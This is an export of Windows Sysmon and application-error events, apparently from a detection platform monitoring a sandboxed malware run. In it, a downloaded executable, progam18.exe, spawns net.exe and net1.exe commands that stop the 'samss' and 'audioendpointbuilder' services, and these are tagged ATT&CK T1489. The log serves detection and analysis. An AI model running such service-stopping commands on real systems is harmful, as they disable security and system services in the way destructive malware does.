+User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:21:07.341346100Z"",""eventRecordID"":""1141"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:21:07.328\r\nProcessGuid: {df9fc3d3-d1c3-5ec7-0000-00105eae2f00}\r\nProcessId: 146396\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:21:07.328"",""processGuid"":""{df9fc3d3-d1c3-5ec7-0000-00105eae2f00}"",""processId"":""146396"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:39:00.138",9,"Windows Application error event","""Faulting application name: RuntimeBroker.exe, version: 10.0.18362.1, time stamp: 0x4539d5a0 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x15c0 +Faulting application start time: 0x01d6303b54371e58 +Faulting application path: C:\Windows\System32\RuntimeBroker.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 036530cd-198c-4ed1-8988-ab9b151b6211 +Faulting package full name: +Faulting package-relative application ID: """,, +"May 23, 2020 @ 12:38:57.133",9,"Windows Application error event","""Faulting application name: svchost.exe, version: 10.0.18362.1, time stamp: 0x32d6c210 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0xc60 +Faulting application start time: 0x01d6303b4f421e75 +Faulting application path: C:\Windows\system32\svchost.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 946ba657-bd34-4b02-ba1a-50e461afe2ea +Faulting package full name: +Faulting package-relative application ID: """,, +"May 23, 2020 @ 12:38:46.198",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:20:37.336 +ProcessGuid: {df9fc3d3-d1a5-5ec7-0000-00104d192700} +ProcessId: 104352 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d1a3-5ec7-0000-0010dab72600} +ParentProcessId: 102756 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:20:37.408323700Z"",""eventRecordID"":""1114"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:20:37.336\r\nProcessGuid: {df9fc3d3-d1a5-5ec7-0000-00104d192700}\r\nProcessId: 104352\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d1a3-5ec7-0000-0010dab72600}\r\nParentProcessId: 102756\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:20:37.336"",""processGuid"":""{df9fc3d3-d1a5-5ec7-0000-00104d192700}"",""processId"":""104352"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d1a3-5ec7-0000-0010dab72600}"",""parentProcessId"":""102756"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:38:44.653",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:20:35.758 +ProcessGuid: {df9fc3d3-d1a3-5ec7-0000-00108dcb2600} +ProcessId: 102880 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d1a3-5ec7-0000-0010c89e2600} +ParentProcessId: 102620 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:20:35.793568100Z"",""eventRecordID"":""1110"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:20:35.758\r\nProcessGuid: {df9fc3d3-d1a3-5ec7-0000-00108dcb2600}\r\nProcessId: 102880\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d1a3-5ec7-0000-0010c89e2600}\r\nParentProcessId: 102620\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:20:35.758"",""processGuid"":""{df9fc3d3-d1a3-5ec7-0000-00108dcb2600}"",""processId"":""102880"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d1a3-5ec7-0000-0010c89e2600}"",""parentProcessId"":""102620"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:38:43.581",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:20:35.458 +ProcessGuid: {df9fc3d3-d1a3-5ec7-0000-0010dab72600} +ProcessId: 102756 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:20:35.479790400Z"",""eventRecordID"":""1109"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:20:35.458\r\nProcessGuid: {df9fc3d3-d1a3-5ec7-0000-0010dab72600}\r\nProcessId: 102756\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:20:35.458"",""processGuid"":""{df9fc3d3-d1a3-5ec7-0000-0010dab72600}"",""processId"":""102756"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:38:43.564",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:20:35.139 +ProcessGuid: {df9fc3d3-d1a3-5ec7-0000-0010c89e2600} +ProcessId: 102620 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900} +ParentProcessId: 2284 +ParentImage: C:\Users\John Williams\Downloads\progam18.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\progam18.exe"" ""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:20:35.184575300Z"",""eventRecordID"":""1108"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:20:35.139\r\nProcessGuid: {df9fc3d3-d1a3-5ec7-0000-0010c89e2600}\r\nProcessId: 102620\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-d15d-5ec7-0000-00103e661900}\r\nParentProcessId: 2284\r\nParentImage: C:\\Users\\John Williams\\Downloads\\progam18.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\progam18.exe\"" \""""},""eventdata"":{""utcTime"":""2020-05-22 13:20:35.139"",""processGuid"":""{df9fc3d3-d1a3-5ec7-0000-0010c89e2600}"",""processId"":""102620"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-d15d-5ec7-0000-00103e661900}"",""parentProcessId"":""2284"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\progam18.exe\\\""""}}}" +"May 23, 2020 @ 12:38:41.805",9,"Windows Application error event","""Faulting application name: GameBarFTServer.exe, version: 3.38.2002.25003, time stamp: 0x5e5603d7 +Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 +Exception code: 0xc0000005 +Fault offset: 0x00007ff75b59e38d +Faulting process id: 0x18b0 +Faulting application start time: 0x01d6303b6919b3f9 +Faulting application path: C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_3.38.25003.0_x64__8wekyb3d8bbwe\GameBarFTServer.exe +Faulting module path: unknown +Report Id: 14cdca0f-6a98-4c3b-ab89-acde7038f8e1 +Faulting package full name: Microsoft.XboxGamingOverlay_3.38.25003.0_x64__8wekyb3d8bbwe +Faulting package-relative application ID: App""",, +"May 23, 2020 @ 12:38:34.234",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:20:26.104 +ProcessGuid: {df9fc3d3-d19a-5ec7-0000-001061332500} +ProcessId: 88516 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d198-5ec7-0000-001007f72400} +ParentProcessId: 86532 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:20:26.147811400Z"",""eventRecordID"":""1103"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:20:26.104\r\nProcessGuid: {df9fc3d3-d19a-5ec7-0000-001061332500}\r\nProcessId: 88516\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-d198-5ec7-0000-001007f72400}\r\nParentProcessId: 86532\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-22 13:20:26.104"",""processGuid"":""{df9fc3d3-d19a-5ec7-0000-001061332500}"",""processId"":""88516"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-d198-5ec7-0000-001007f72400}"",""parentProcessId"":""86532"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:38:34.217",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:20:25.908 +ProcessGuid: {df9fc3d3-d199-5ec7-0000-00108c302500} +ProcessId: 88508 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-d197-5ec7-0000-001040e52400} +ParentProcessId: 85008 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" 